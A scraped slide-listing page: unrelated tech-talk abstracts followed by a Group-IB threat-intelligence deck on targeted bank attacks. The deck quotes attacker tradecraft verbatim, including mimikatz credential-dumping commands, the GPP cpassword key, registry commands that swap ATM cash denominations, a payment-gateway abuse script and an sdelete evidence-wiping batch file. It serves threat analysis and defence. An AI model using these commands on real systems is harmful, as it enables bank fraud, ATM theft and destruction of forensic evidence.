This is a hands-on session specifically designed for automation developers and AI enthusiasts seeking to enhance their knowledge in leveraging the latest intelligent document processing capabilities offered by UiPath.
Speakers:
👨🏫 Andras Palfi, Senior Product Manager, UiPath
👩🏫 Lenka Dulovicova, Product Program Manager, UiPath
Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024Tobias Schneck
As AI technology is pushing into IT I was wondering myself, as an “infrastructure container kubernetes guy”, how get this fancy AI technology get managed from an infrastructure operational view? Is it possible to apply our lovely cloud native principals as well? What benefit’s both technologies could bring to each other?
Let me take this questions and provide you a short journey through existing deployment models and use cases for AI software. On practical examples, we discuss what cloud/on-premise strategy we may need for applying it to our own infrastructure to get it to work from an enterprise perspective. I want to give an overview about infrastructure requirements and technologies, what could be beneficial or limiting your AI use cases in an enterprise environment. An interactive Demo will give you some insides, what approaches I got already working for real.
Epistemic Interaction - tuning interfaces to provide information for AI supportAlan Dix
Paper presented at SYNERGY workshop at AVI 2024, Genoa, Italy. 3rd June 2024
https://alandix.com/academic/papers/synergy2024-epistemic/
As machine learning integrates deeper into human-computer interactions, the concept of epistemic interaction emerges, aiming to refine these interactions to enhance system adaptability. This approach encourages minor, intentional adjustments in user behaviour to enrich the data available for system learning. This paper introduces epistemic interaction within the context of human-system communication, illustrating how deliberate interaction design can improve system understanding and adaptation. Through concrete examples, we demonstrate the potential of epistemic interaction to significantly advance human-computer interaction by leveraging intuitive human communication strategies to inform system design and functionality, offering a novel pathway for enriching user-system engagements.
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...DanBrown980551
Do you want to learn how to model and simulate an electrical network from scratch in under an hour?
Then welcome to this PowSyBl workshop, hosted by Rte, the French Transmission System Operator (TSO)!
During the webinar, you will discover the PowSyBl ecosystem as well as handle and study an electrical network through an interactive Python notebook.
PowSyBl is an open source project hosted by LF Energy, which offers a comprehensive set of features for electrical grid modelling and simulation. Among other advanced features, PowSyBl provides:
- A fully editable and extendable library for grid component modelling;
- Visualization tools to display your network;
- Grid simulation tools, such as power flows, security analyses (with or without remedial actions) and sensitivity analyses;
The framework is mostly written in Java, with a Python binding so that Python developers can access PowSyBl functionalities as well.
What you will learn during the webinar:
- For beginners: discover PowSyBl's functionalities through a quick general presentation and the notebook, without needing any expert coding skills;
- For advanced developers: master the skills to efficiently apply PowSyBl functionalities to your real-world scenarios.
Key Trends Shaping the Future of Infrastructure.pdfCheryl Hung
Keynote at DIGIT West Expo, Glasgow on 29 May 2024.
Cheryl Hung, ochery.com
Sr Director, Infrastructure Ecosystem, Arm.
The key trends across hardware, cloud and open-source; exploring how these areas are likely to mature and develop over the short and long-term, and then considering how organisations can position themselves to adapt and thrive.
Securing your Kubernetes cluster_ a step-by-step guide to success !KatiaHIMEUR1
Today, after several years of existence, an extremely active community and an ultra-dynamic ecosystem, Kubernetes has established itself as the de facto standard in container orchestration. Thanks to a wide range of managed services, it has never been so easy to set up a ready-to-use Kubernetes cluster.
However, this ease of use means that the subject of security in Kubernetes is often left for later, or even neglected. This exposes companies to significant risks.
In this talk, I'll show you step-by-step how to secure your Kubernetes cluster for greater peace of mind and reliability.
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered QualityInflectra
In this insightful webinar, Inflectra explores how artificial intelligence (AI) is transforming software development and testing. Discover how AI-powered tools are revolutionizing every stage of the software development lifecycle (SDLC), from design and prototyping to testing, deployment, and monitoring.
Learn about:
• The Future of Testing: How AI is shifting testing towards verification, analysis, and higher-level skills, while reducing repetitive tasks.
• Test Automation: How AI-powered test case generation, optimization, and self-healing tests are making testing more efficient and effective.
• Visual Testing: Explore the emerging capabilities of AI in visual testing and how it's set to revolutionize UI verification.
• Inflectra's AI Solutions: See demonstrations of Inflectra's cutting-edge AI tools like the ChatGPT plugin and Azure Open AI platform, designed to streamline your testing process.
Whether you're a developer, tester, or QA professional, this webinar will give you valuable insights into how AI is shaping the future of software delivery.
Accelerate your Kubernetes clusters with Varnish CachingThijs Feryn
A presentation about the usage and availability of Varnish on Kubernetes. This talk explores the capabilities of Varnish caching and shows how to use the Varnish Helm chart to deploy it to Kubernetes.
This presentation was delivered at K8SUG Singapore. See https://feryn.eu/presentations/accelerate-your-kubernetes-clusters-with-varnish-caching-k8sug-singapore-28-2024 for more details.
4. GROUP-IB.COM
Who are they? What are their favorite targets?
KNOWN TARGETED ATTACKERS
Buhtrap
ARM CBR (SWIFT analog)
Сobalt
ATM, Card processing, SWIFT
Corkow
Trading terminals,
Card processing, ATM
Anunak
Internet banking, ARM CBR,
SWIFT, Payment gateways,
Card processing, ATM
Lurk
ARM CBR (SWIFT analog)
4
5. GROUP-IB.COM 5
FUTURE TARGETED
ATTACKERS
• Toplel
• Ranbyus
• RTM
• Vawtrak
• Dridex
Balance is 500 thousand pounds,
inter-UK, for money mules (now
such money mules now). Skip for
now.
Account for authorization of
payments, balance is 2 million
pounds
No function of payment approval.
Balance is 18 million pounds.
Tried to transfer 2 million to China
Balance is 15 million pounds, dual
authorization off.
No opportunity to establish sort
code for transfer. It is better to
ring out
Future Attackers after your network
7. GROUP-IB.COM
Targets: Corporate internet banking software
• Compromise operator workstations
of corporate accounts
• Listing companies with high balances
• Generating new digital signatures
for each company
• Transactions from corporate accounts signed
with new digital signatures
7
Access to corporate internet banking
enables criminals to steal from TOP
clients. Anunak used this method in
2013-2014.
8. GROUP-IB.COM
Targets: Payment gateways
$ses = date("Ymdhis");
$url = "http://ru-demo.cyberplat.com/cgi-
bin/DealerSertification/de_pay.cgi";
$data_string =
"SD=XXXXXX&AP=XXXXXX&OP=XXXXX&SESSION=".$ses."&COMM
ENT=Test&NUMBER=9642065662&AMOUNT_ALL=10.0&AMOUNT
=10.0";
$ch = curl_init();
curl_setopt($ch,CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, array('Content-Type:
application/x-www-form-urlencoded','Content-Length:
'.strlen($data_string)));
curl_setopt($ch, CURLOPT_POSTFIELDS,
"inputmessage=0000038801SM000001270000012700000125&".$
data_string);
$result = curl_exec($ch);
var_dump($result);
• Once inside, hackers search for payment gateways
• Obtain log files from payment gateways to understand
the typical format of communication
• Start SOCKS proxies on internal hosts to enable
communication with payment gateways
• Run scripts to replenish attacker’s phone balances in
thousands of transactions
• Transfer money from phones to cards and cash out
8
Payment gateways enables high frequency, low
amount transfers. Very hard to stop and return
money.
9. GROUP-IB.COM
Targets: ATM
• Hackers Identify ATM manufactures
• They detect physical ATM locations
• Upload from internal network to ATM
• Jackpot with diagnostic tools
• Jackpot with custom malicious programs for specific ATMs
9
ATM heists – the easiest way to launder money.
Cobalt used malware to withdraw bags cash
totalling $2.6m from 41 ATMS in Taiwan.
10. GROUP-IB.COM
Targets: Trade terminals
• The attack lasted only 14 minutes
• $437 million in purchases (5 trades )
• $97 million sold (2 trades)
• 55 to 66 Rubles — volatility in exchange
rate
10
Corkow conducted the first
successful attack on broker
terminals in 2015.
12. GROUP-IB.COM
Targets: ARM CBR or SWIFT
SWIFT
[ROOT_DRIVE]:UsersAdministratorAppDataLocalAlliansmcmin
[ROOT_DRIVE]:UsersAdministratorAppDataLocalAlliansmcmout
ARM CBR
[ROOT_DRIVE]:uarm3exqinc
[ROOT_DRIVE]:uarm3exqout
• Identify working directory of
SWIFT or ARM CBR application
• Replace payment details with
fraudster’s information
• Intercept confirmation messages
to bypass identification of
fraudulent transactions
12
13. GROUP-IB.COM
Targets: Card processing
• Legally open bank cards in the same
bank or buy new cards on dark
market (usually about 30 cards)
• Remove or increase withdraw limits
• Remove overdraft limits
(even for debit cards)
• Cash out using these cards in other
countries
13
Cobalt, Corkow, Anunak have been conducting
these attacks since 2014.
It provides very important cash-out benefits.
15. GROUP-IB.COM
Malware Delivery: Driveby
GROUPS WHICH HAVE USED
THIS METHOD:
• Anunak
• Corkow
• Buhtrap
• Lurk
800 000+ total visitor per day
11% average exploit success rate
90 000 possible infections per day
15
16. GROUP-IB.COM
Malware Delivery: Custom pay-per-install
GROUPS WHICH HAVE USED THIS
METHOD:
• Anunak
#!/usr/bin/python
# -*- coding: utf-8 -*-
import os
from bulkwhois.shadowserver import BulkWhoisShadowserver
iplist_file = 'ip.txt'
path = os.path.dirname(os.path.abspath(__file__))
bulk_whois = BulkWhoisShadowserver()
iplist = []
with open(os.path.join(path, iplist_file)) as f:
for line in f:
iplist.append(line.strip())
result = bulk_whois.lookup_ips(iplist)
with open(os.path.join(path, 'data.txt'), 'a') as f:
for record in result:
f.write('IP: %s
CC: %s
Org. Name: %s
Register: %s
AS Name: %s
BGP Prefix: %s
-------------------------------------------------------
' % (result[record]['ip'], result[record]['cc'], result[record]['org_name'],
result[record]['register'], result[record]['as_name'],
result[record]['bgp_prefix']))
16
WHAT THEY DID:
• Contact botnet owner
• Ask to provide IPs of infected machines
• Check IP list with script
• Check for records related to financial institutions
• Ask botnet owner to install new trojan
17. GROUP-IB.COM
Malware Delivery: Web hack
17
GROUPS WHICH HAVE USED THIS METHOD:
• Anunak and individual hackers in 2013, 2014, 2015
WHAT THEY DO:
• Identify SQL injection
• Do EXEC in SQL request to gather information about net environment
• Upload files on server with
echo command
downloading from remote host
with Meterpreter
• Upload mimikatz on the Domain Controller
• Create hidden tunnels
18. GROUP-IB.COM
Malware Delivery: Phishing Emails
GROUPS WHICH HAVE
USED THIS METHOD:
• Anunak
• Buhtrap
• Lurk
• Cobalt
• MoneyTaker
METHODS TO ENSURE
DOCUMENTS ARE
OPENED:
• Mass mailing to corporate
email addresses
• Calls to bank managers
• Hacking bank clients
• Hacking bank partners
ATTACHMENTS:
• Executables
• Executables in
encrypted archive
• Document with exploits
• Document with
malicious macros
18
19. GROUP-IB.COM
Malware Delivery: Spear phishing with faked sender address
ADVANTAGES
DISADVANTAGES
• Easy to start
• Unlimited list of brands
• No need to register domains
• Less traces for the investigation
• High level of trust for users
• Hard to detect if email delivered
to end user
• Don’t pass Sender Policy
Framework (SPF) check
• Low delivery percent
19
20. GROUP-IB.COM
ADVANTAGES
DISADVANTAGES
• Can bypass Sender Policy Framework (SPF) check
• New TLD allows registering very similar domains
• High percent of delivery
• Vigilant users can detect it
• Additional traces for investigation
Malware Delivery: Spear phishing with faked sender address
20
21. GROUP-IB.COM
Malware Delivery: Spear phishing from compromised partner
ADVANTAGES
DISADVANTAGES
• Almost 100% delivery with correct attachment
• High percent of opening by users from contact list
• No need to rent server and register domains
• Limited by region where partner is located
21
22. GROUP-IB.COM
Tools to create malicious documents
Microsoft Word Intruder
(MWI)
OffensiveWare Multi Exploit
Builder (OMEB)
22
25. GROUP-IB.COM
Legal Software vs. Private Tools
New trend: Hackers Use Legal Software for Their Attacks
PRIVATE TOOLS LEGAL SOFTWARE
+
–
Legal attack framework has become very effective. Special trojans are not necessary anymore.
• Unknown before first public research
• Adjusted to the needs of the group
• Easy to use
• Inexperienced attackers can be involved
• Investments in development are needed
• High cost of ownership
• Becomes known quickly
• Dependency on developers
• Attracts attention
• Easier to attribute incidents and threat actors
• Simplifies the process of investigation
• Hard to track such attacks
• Difficult to link different incidents
• Less traces to investigate
• Difficult to detect in a local network
• Higher qualification
• Many solutions are DIY
• Difficult to attack several
targets simultaneously
25
28. GROUP-IB.COM
Gaining privileges
DOMAIN CONTROLLER
CONFIGURATION ERROR
• Using Group Policy Preferences (GPP)
• [server_name]sysvol[domain_name]Policies[group_policy_nam
e]MachinePreferencesGroupsGroups.xml
• The perpetrators extract domain administrator credentials from the
cpassword and userName fields in the Groups.xml file (the password
is encrypted using the AES-256 algorithm and further coded using
Base64 encoding).
• To obtain an unencrypted password the attackers decode it using
Base64.
• This password is then decrypted using the key
4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b
66c1b.
28
29. GROUP-IB.COM
Gaining privileges
MIMIKATZ
If the attackers have access to a domain controller
mimikatz sekurlsa::logonpasswords
If the attackers have local root privileges without
access to a domain controller
The attackers connect to workstations and servers in order to find a user with
access to the domain controller. The attack pass-the-hash can be performed.
29
30. GROUP-IB.COM
Gaining privileges
MIMIKATZ
If the attackers do not have local administrator rights
Exploiting the operating system vulnerabilities CVE-2014-4113, CVE-2015-1701,
CVE-2015-2363 and CVE-2015-2426 enables the criminal to gain SYSTEM level
privileges in x32 and x64 operating systems. The malware connects to hosts
andcheck them for necessary vulnerabilities.
MIMIKATZ GOLDEN TICKET
• "privilege::debug" "lsadump::samrpc /patch" exit
• extracting NTLM hash of the krbtgt account
(Key Distribution Center Service Account)
• creating a file with a gold TGT ticket
30
31. GROUP-IB.COM
Tools to research the network
netscan.exe – a network scanner NetScan
patch86.exe – a Termsrv patch to support simultaneous terminal sessions (KEY indicator)
plink.exe – an ssh console client for Windows
psexec.exe – a remote console for Windows
31
32. GROUP-IB.COM
Tools to research the network
REMOTE
ADMINISTRATION TOOLS:
• AmmyAdmin
• TeamViewer or TVRat
• Hamachi LogMeIn
• RMS
• LightManager
• HidenVNC
• Hidden channel over SMB,
DNS, HTTPS
32
35. GROUP-IB.COM
Change denomination of withdrawal banknotes
.bat file from ATM
Registry key name Value
VALUE_1 5000
VALUE_2 1000
VALUE_3 500
VALUE_4 100
• Remote access to ATM from internal network
• Launch .bat script that changed registry keys
• Money mule came to the ATM and withdraw cash from its bank account
• During withdraw he set small denominations
• Instead of small denominations the ATM spit out big denominations
from wrong cassette
REG ADD "HKEY_LOCAL_MACHINESOFTWAREWincor NixdorfProTopasCurrentVersionLYNXPARCASH_DISPENSER" /v VALUE_1 /t REG_SZ /d "5000" /f
REG ADD "HKEY_LOCAL_MACHINESOFTWAREWincor NixdorfProTopasCurrentVersionLYNXPARCASH_DISPENSER" /v VALUE_2 /t REG_SZ /d "1000" /f
REG ADD "HKEY_LOCAL_MACHINESOFTWAREWincor NixdorfProTopasCurrentVersionLYNXPARCASH_DISPENSER" /v VALUE_3 /t REG_SZ /d "500" /f
REG ADD "HKEY_LOCAL_MACHINESOFTWAREWincor NixdorfProTopasCurrentVersionLYNXPARCASH_DISPENSER" /v VALUE_4 /t REG_SZ /d "100" /f
REG ADD "HKEY_LOCAL_MACHINESOFTWAREWincor NixdorfProTopasCurrentVersionLYNXPARCASH_DISPENSER" /v VALUE_1 /t REG_SZ /d "100" /f
REG ADD "HKEY_LOCAL_MACHINESOFTWAREWincor NixdorfProTopasCurrentVersionLYNXPARCASH_DISPENSER" /v VALUE_4 /t REG_SZ /d "5000" /f
shutdown -r -t 0 -f
35
36. GROUP-IB.COM
Modified diagnostic tools
• Attackers disabled the KDIAG function responsible for checking if the door is open.
• Uploaded a modified version of KDIAG to the ATM and sent the command to withdraw cash
• At the same time, a money mule came to the ATM with an open bag to grab money
36
37. GROUP-IB.COM
Software for attacks on ATMs
ServiceLogicalName — a service name used as an argument for the WFSOpen function (for example, “Cash Dispenser Module”).
Cassettes Count — the total number of cassettes on the device. The value should be set in the interval from 1 to 15.
Cassette Number — the number of the cassette, which should dispense cash. The value should be set in the interval from 1 to 15.
Banknotes Count — the amount of banknotes to be dispensed from the cassette. The value should be set in the interval from 1 to 60.
Dispenses Count — the number of times cash dispenses should be repeated. The value should be set in the interval from 1 to 60.
A malicious program that uses standard functions for the XFS interface
via the XFS Manager (eXtensions for Financial Services).
37
38. GROUP-IB.COM
Outward Telegraphic Transfer Comm & Charges
MD5 6D355FFA06AE39FC8671CC8AC38F984E
Searches files in catalog:
D:WIN32APPSWIFTALLIANCESERVERBatchOutgoingHKHKAcksBak
In this instance, «Outgoing» signifies outgoing transactions, «HK» signifies Hong
Kong, accordingly the program searches for transactions to Hong Kong banks.
If file is bigger than 102400 bytes it then attaches into file
C:TempMsglog.txt «Too big file <file name> : <file size> > 102400rn», it
opens and will search substrings: «OTTC605384», «OTTC605385»,
«OTTC601386», «OTTC601387», «OTTC605381», «OTTC605382»
If a file contains this substring, then it writes into log C:TempMsglog.txt
the following string «Found file: %s with required token: <founded
substring>rn» and copies this file into directory «C:TempMsg»
Then it goes into standby mode each 2.5 seconds, and then repeats the search
of the substring.
Hong Kong-based FI
OTTC605384
OTTC605385
OTTC601386
OTTC601387
OTTC605381
OTTC605382
38
39. GROUP-IB.COM
ARM CBR (SWIFT analoge)
MONEYTAKER V5.0
Four modules:
Main – launch other modules with parameters specified in main config file
AutoReplacer (XmlBin) – replaces in ARM CBR directory payment details. Results of
replacement writes to Xml-Resultfile. Do not change SUM field to avoid detection.
Hiding (EdBin) – checks for incoming/confirmation messages. It checks for field
«PayeePersonalAcc» and compare it with «HackAcc» in from Xml-Resultfile.
If the values match, then hiding module restore original PayeePersonalAcc field.
Temp (TxtBin) – unknown.
Xml-Resultfile
#
#
Id=
OrigAcc=
OrigBic=
OrigCor=
Purpose=
HackAcc=
HackBic=
HackCor=
Sum=
PayerPersonalAcc=
#
#
39
40. GROUP-IB.COM
Software to clean evidences
DEL.BAT
sdelete.exe -accepteula -p 32 d2.exe
sdelete.exe -accepteula -p 32 xtl.exe
sdelete.exe -accepteula -p 32 *.txt
sdelete.exe -accepteula -p 32 d2s.exe
del sdelete.exe
del del.bat
The del.bat script launches the SDelete program,
which is designed to delete files in a special
manner making it impossible to recover them
with a forensic investigation.
MBR KILLER
Program deletes Master boot record (MBR)
40
41. GROUP-IB.COM
Future
More criminal groups
Targeted attacks is a new call for attackers who
know about banks and money laundering
More attacks
Global landscape, ready to use tools, technics
and tactics allows to be more effective.
Legal software
We will see much more attacks with use if legal
software without private trojans.
Harder to attribute and investigate
Legal software in attacks will force us to change
attribution and investigation procedures.
41